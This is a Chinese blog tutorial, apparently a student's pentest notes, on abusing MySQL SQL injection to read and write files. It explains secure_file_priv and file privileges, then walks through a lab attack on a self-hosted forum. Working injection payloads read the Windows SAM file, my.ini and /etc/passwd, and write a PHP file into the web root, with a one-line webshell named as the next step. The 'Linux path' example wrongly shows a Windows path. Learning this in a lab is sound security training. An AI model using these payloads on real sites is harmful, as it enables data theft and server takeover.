【SQL注入-13】利用SQL注入漏洞读写文件案例

最新推荐文章于 2024-05-20 14:42:09 发布
最新推荐文章于 2024-05-20 14:42:09 发布
阅读量1.9k 收藏 18
点赞数 4
分类专栏: # 入门07 Web安全之渗透测试 文章标签: sql注入 读写文件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64378913/article/details/124446664
版权

目录

1 读写文件的前提条件

我们也可以利用SQL注入漏洞读写文件。但是读写文件需要一定的条件。

1.1 secure-file-priv参数

利用SQL注入漏洞进行文件读写,需要后台数据库开启一定的设置。

1.1.1 作用

secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。
secure_file_priv参数配置及含义如下:

secure_file_priv参数配置含义
secure_file_priv=null表示限制mysqld 不允许导入或导出
secure_file_priv='/tmp/ ’表示限制mysqld 的导入或导出只能发生在/tmp/目录下
secure_file_priv=表示不对mysqld 的导入或导出做限制

1.1.2 secure-file-priv参数值的查看

1.1.2.1 远程查看

该参数可以 远程登录数据库后台管理页面中查看(在phpMyAdmin)。

  • 浏览器中访问数据库后台管理页面(phpMyAdmin)并登录。
  • 点击变量,在搜索框中查找(输入sec并回车),就可以搜索出secure-file-priv参数,我们看到这里参数的值是null,也就是说不允许导入导出。
    在这里插入图片描述
    在这里插入图片描述
1.1.2.2 本地查看

在安装有数据库的系统上登录数据库后,通过命令查看

  • 在cmd窗口登录数据库。先cd到安装mysql的文件夹中cd C:\phpStudy\PHPTutorial\MySQL\bin,再使用命令mysql -u root -proot回车(用的是phpstudy默认的账号密码登录)。
  • 查找secure-file-priv参数。输入命令:show global variables like '%secure%',可以看到secure-file-priv参数的值是null,也就是说不允许导入导出。
    在这里插入图片描述

1.1.3 secure-file-priv参数值的更改

该参数无法通过远程方式进行更改,只能通过修改配置文件进行更改。具体操作步骤如下:
(1)打开my.ini配置文件。进入mysql的安装文件夹,找到里面的my.ini配置文件,以记事本或VS code等方式打开编辑。
在这里插入图片描述
(2)在[mysqld]内增加secure_file_priv =,保存文件退出,并重启phpstudy。
在这里插入图片描述
在这里插入图片描述

(3)刷新后再次查看,可以看到secure-file-priv参数为空,表示允许导入导出操作。
在这里插入图片描述

1.2 当前用户具有文件权限

注意,想要完成导入导出操作,需要当前用户具有相应文件权限。
使用命令select file_priv from mysql.user where user="root" and host="localhost";查询当前用户是否具有文件权限。在这里插入图片描述

1.3 需要知道文件的绝对路径

读取和写入文件时需要知道文件的绝对路径。

2 读取和写入文件

2.1 读取文件

使用load_file()函数读取文件,需要使用绝对路径。

不同系统的绝对路径示意:

  • windows路径:C:\Windows\System32\config\SAM
  • Linux路径:C:/Windows/System32/config/SAM

注入命令例如:?id=1 union select 1,load_file(‘C:\Windows\System32\config\SAM’),3。读取文件时采用联合查询的方式。

2.2 写入文件

使用select……into_outfile'绝对路径'导入数据到pc的指定目录下。
注入命令例如:?id=-5 union select 1,'<?php phpinfo();?>',3 into_outfile 'C:\\phpStudy\\PHPTutorial\\WWW\\test.php'。网页可能会报错,不过可能成功了,可以访问试试。

3 读取和写入文件具体实例

3.1 操作环境

实验靶场——虚拟机(IP为172.16.1.1):本节实验靶场是在win2008系统上基于phpstudy搭建的一个简单网站,win2008及phpstudy的安装过程可以参考《【语言环境】WAMP环境部署及优化—以win2008R2SP1为操作系统》,网站的搭建过程可以参考《【(SQL+HTML+PHP)综合】一个简单论坛网站的综合开发案例

注入工具——真实机:本实验利用火狐浏览器来实现union注入,为方便注入过程的编码,建议安装一个扩展插件harkbar,安装过程参考《HackBar免费版安装方法》由于该教程中的2.1.3harkbar我安装后无法正常使用,就安装了HackBar Quantum来代替。安装后出现下图左侧的东西。
在这里插入图片描述

3.2 操作步骤

3.2.1 判断注入点与注入类型

在该阶段主要是尝试不同的输入参数,根据网页反馈信息来判断是否存在注入点以及注入类型,如是否是字符型还是数值型。
(1)用浏览器访问我们的留言论坛,并点击第一条留言进入测试界面。

在这里插入图片描述
在这里插入图片描述
(2)将参数修改为?id=5,并刷新,看到页面变化如下,弹出第5条留言内容,由此可推测见后台是根据id参数的不同来反馈不同信息,因此推测留言内容极有可能是存在数据库中,可控参数id与数据库存在交互,很可能存在sql注入。
在这里插入图片描述
(3) 当参数为?id=5 and 1=1;返回页面与原页面一致 。通过该参数我们可以分析得到该注入数据类型为数值型,原因如下:

  • 猜测为数值型,则后台SQL语句为 select * from table where id=5 and 1=1,where语句判断条件为真且id=5,语句正常执行。
  • 猜测为字符型,则后台SQL语句为 select * from table where id=‘5 and 1=1’,where语句将找不到id为‘5 and 1=1’的参数,语句执行失败。
    在这里插入图片描述

3.2.2 判断回显列数和回显位置

(1)修改参数为 ?id=5 union select 1,2,3,4 ,说明原参数回显数据有4列,也可以根据传统方法先用order进行尝试。
在这里插入图片描述
(2)修改参数为?id=-5 union select 1,2,3,4,回显结果如下,说明有第2、3、4显示位,可以利用为union联合查询注入。
在这里插入图片描述

(3)结论

  • 因为id参数是用户可控的,会随请求带入到数据库中执行并回显相应内容,是一个注入点。
  • 根据第3步说明参数为数值型。
  • 利用union联合查询有4列数据,其中第2、3、4位能回显。

3.2.3 获取数据库路径

参改参数为?id=-1 union select 1,2,3,@@datadir,通过该命令获取后台数据库的绝对路径,如下:
在这里插入图片描述

3.3 读取数据库文件配置

修改参数为?id=-5 union select 1,2,3,load_file('C:\\phpStudy\\PHPTutorial\\MySQL\\my.ini')获取数据库配置文件,并回显到网页上。问题关键转变为如何获取想要文件的路径
在这里插入图片描述

3.4 写入文件

假设我们通过某些方式知道了网站的根目录路径为C:\phpStudy\PHPTutorial\WWW。以后得学学怎么获取到根目录路径。
利用写入文件函数,以后可以写入一句话木马或者PHP探针。此处以PHP探针为例。修改参数注入参数为 ?id=-1 union select 1,2,3,'<?php phpinfo();?>' into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\test.php",出现页面如下,虽然出现警告,但是我们文件已经成功写入了。
在这里插入图片描述
验证下是否写入成功。在浏览器访问目标IP下的文件test.php,成功执行该文件并返回PHP探针信息。
在这里插入图片描述

4 总结

(1)利用SQL注入漏洞读写文件既受到数据库secure-file-priv参数设置的制约,又受到用户权限的制约,同时还得知道文件的绝对路径。
(2)掌握利用SQL漏洞进行文件读写的方法。
(3)后续需要进一步了解如何获取网站根目录路径的方法。

参考文章

[1] 《【SQL注入16】SQL漏洞利用之读写文件

像风一样9
关注
  • 4
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入入侵动网SQL版论坛
12-16
在这个案例中,我们看到攻击者是如何利用SQL注入漏洞来侵入动网SQL版论坛的。动网论坛是一个基于ASP和SQL Server 2000的平台,虽然最新的版本7.0+SP2被认为具有较高的安全性,但任何系统都不能完全免疫于攻击。 ...
sql反射模式完整版
11-30
8. **SQL注入**:不安全的SQL构造方式会暴露系统于SQL注入攻击,这是一种常见的安全漏洞。使用预编译的SQL语句和参数化查询可以防止这种情况。 9. **无计划的大表更新**:对大表进行全表扫描或更新可能会阻塞其他...
SQL注入16】SQL漏洞利用读写文件
Fighting_hawk的博客
02-22 4348
1. 对文件进行读写既收到文件系统对用户权限的制约、也收到数据库设置的制约。 2. 掌握利用SQL漏洞进行文件读写的方法。 3. 后续需要进一步了解如何获取网站目录路径的方法。
SQL注入基础原理与案例(详细总结)
剁椒鱼头没剁椒的博客
10-20 6563
本篇总结了学习SQL注入的笔记,暂时没总结WAF绕过方面的内容,后期会对WAF绕过进行总结。目前先总结一些基础的东西,可能有些参数不全,具体的参数或者函数可以百度搜索一下。发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。
Mysql 中的secure_file_priv参数设置
最新发布
weixin_42515203的博客
05-20 840
该参数的设置可以通过my.ini(windows版本)/my.cnf(Linux版本)中设置。secure_file_priv是MySQL中的系统变量,用于限制文件的读取和写入。启动MySQL,先查看secure_file_priv的值。
MySQL 全局配置 --secure-file-priv
热门推荐
zaihukeji的博客
08-20 2万+
一则问题 在执行导出INFORMATION_SCHEMA.OPTIMIZER_TRACE内容到本地文件时: SELECT TRACE INTO DUMPFILE "optimizer_trace.txt" FROM INFORMATION_SCHEMA.OPTIMIZER_TRACE; 报错提示如下: (1290, 'The MySQL server is running with the --secure-file-priv option so it cannot execute this..
mysql配置secure_file_priv
jkzyx123的博客
09-06 8393
secure_file_priv 配置项控制LOAD DATA, SELECT …OUTFILE, LOAD_FILE()的使用权限。
MySQL数据库数据导出出现1290(secure_file_priv)错误解决方法
m0_73633088的博客
01-15 4952
1290(secure_file_priv)mysql数据库数据导出错误解决方案
高德经典数据库实践案例分享.pdf
08-29
- 标签提到的“web安全”、“漏洞分析”和“金融安全”,暗示了在数据库设计中需要考虑网络安全,防止SQL注入、XSS攻击等,同时保证金融交易数据的安全性。 - “法律法规”提示在设计系统时需遵循相关的数据保护...
Java-Study:Java知识点总结
05-09
- 输入验证:防止SQL注入、XSS攻击,确保用户输入的数据安全。 - CSRF防护:使用CSRF Token,防止跨站请求伪造攻击。 - 安全编码:遵循OWASP Top 10,避免常见的编程漏洞,如不当的错误处理和不安全的直接对象...
oracle jdbc驱动 ojdbc14-10.2.0.4.0.jar工具
01-11
`Statement`用于执行静态SQL,而`PreparedStatement`用于执行预编译的SQL,能提高性能并防止SQL注入。 4. **处理结果**:通过`executeQuery()`执行查询后,可以获取`ResultSet`对象,从中遍历查询结果。 5. **关闭...
SQL注入漏洞过程实例及解决方案
09-08
主要介绍了SQL注入漏洞过程实例及解决方案,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
mysql sql注入例子_SQL注入的实际案例
weixin_39723010的博客
02-05 937
发动SQL注入要做的三件事确定Web应用程序所使用的技术为了确定所采用的技术,攻击者可以考察Web页面的页脚,查看错误页面,检查页面源代码,或者使用诸如Nessus、AWVS、APPSCAN等工具来进行刺探。确定所有可能的输入方式一般来说,所有HTTP的GET和POST都应当作用户输入。为了找出一个Web应用所有可能的用户输入,我们可以求助于Web代理,如Burp等。查找可以用于注射的用户输入在找...
(Database) MySQL 导出 .csv 时修改导出权限 secure_file_priv
weixin_43728138的博客
10-20 478
作者为 MacOS 系统在使用时遇到无法导出的问题检查后发现输入以下代码后结果为即我们现在无法进行任何导出文件的操作。
SQL注入文件读写
永远是少年
06-27 2212
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQL注入文件读写。 一、SQL注入文件读写函数 二、SQL注入文件读写之secure_file_priv参数 三、SQL注入文件路径获取 四、SQL注入文件读写之魔术引导开关......
Mysql 导入文件提示 --secure-file-priv option 问题
weixin_30607659的博客
04-18 1030
MYSQL导入CSV格式文件数据执行提示错误(ERROR 1290): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement. 【1】分析原因 其实原因很简单,因为在安装MySQL的时候限制了导入与导出的目录权限。只允许在规定的目录下才能导入。 可...
mysql 报错注入 读文件_SQL注入-读写文件
weixin_42515739的博客
01-21 841
SQL注入-读取文件使用函数 load_file("文件路径/名称")1、读取/etc/passwd 文件(SQL注入只能读取/etc/passwd文件,不能读取其他文件)http://192.168.1.64/sqli-labs/Less-1/?id=-1' union select 1,load_file("/etc/passwd"),3 or '1'='12、若读取其他文件则没效果显示htt...
sql注入文件写入
一只菜鸟的博客
10-31 1820
sql注入中写入webshell的几种方式 secure_file_priv="c:/…"被注释掉或者是web路径 php.ini中的get_magic_quotes_gpc()函数未开启 其中secure_file_priv有三种情况 在进行写入websell时,要注意参数secure_file_priv是否有指定路径或者是否为null。最好要获得root权限 空,表示导入导出没有任何限制 有指定路径,比如("c:/xxx/xxx"):只能向指定路径导入导出文件 nul
SQL 注入攻击
icy_xm的专栏
01-13 886
一位客户让我们针对只有他们企业员工和顾客能使用的企业内网进行渗透测试。这是安全评估的一个部分,所以尽管我们之前没有使用过SQL注入来渗透网络,但对其概念也相当熟悉了。最后我们在这项任务中大获成功,现在来回顾一下这个过程的每一步,将它记录为一个案例。 “SQL注入”是一种利用未过滤/未审核用户输入的攻击方法(“缓存溢出”和这个不同),意思就是让应用运行本不应该运行的SQL代码。如果应用毫无防备地创

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值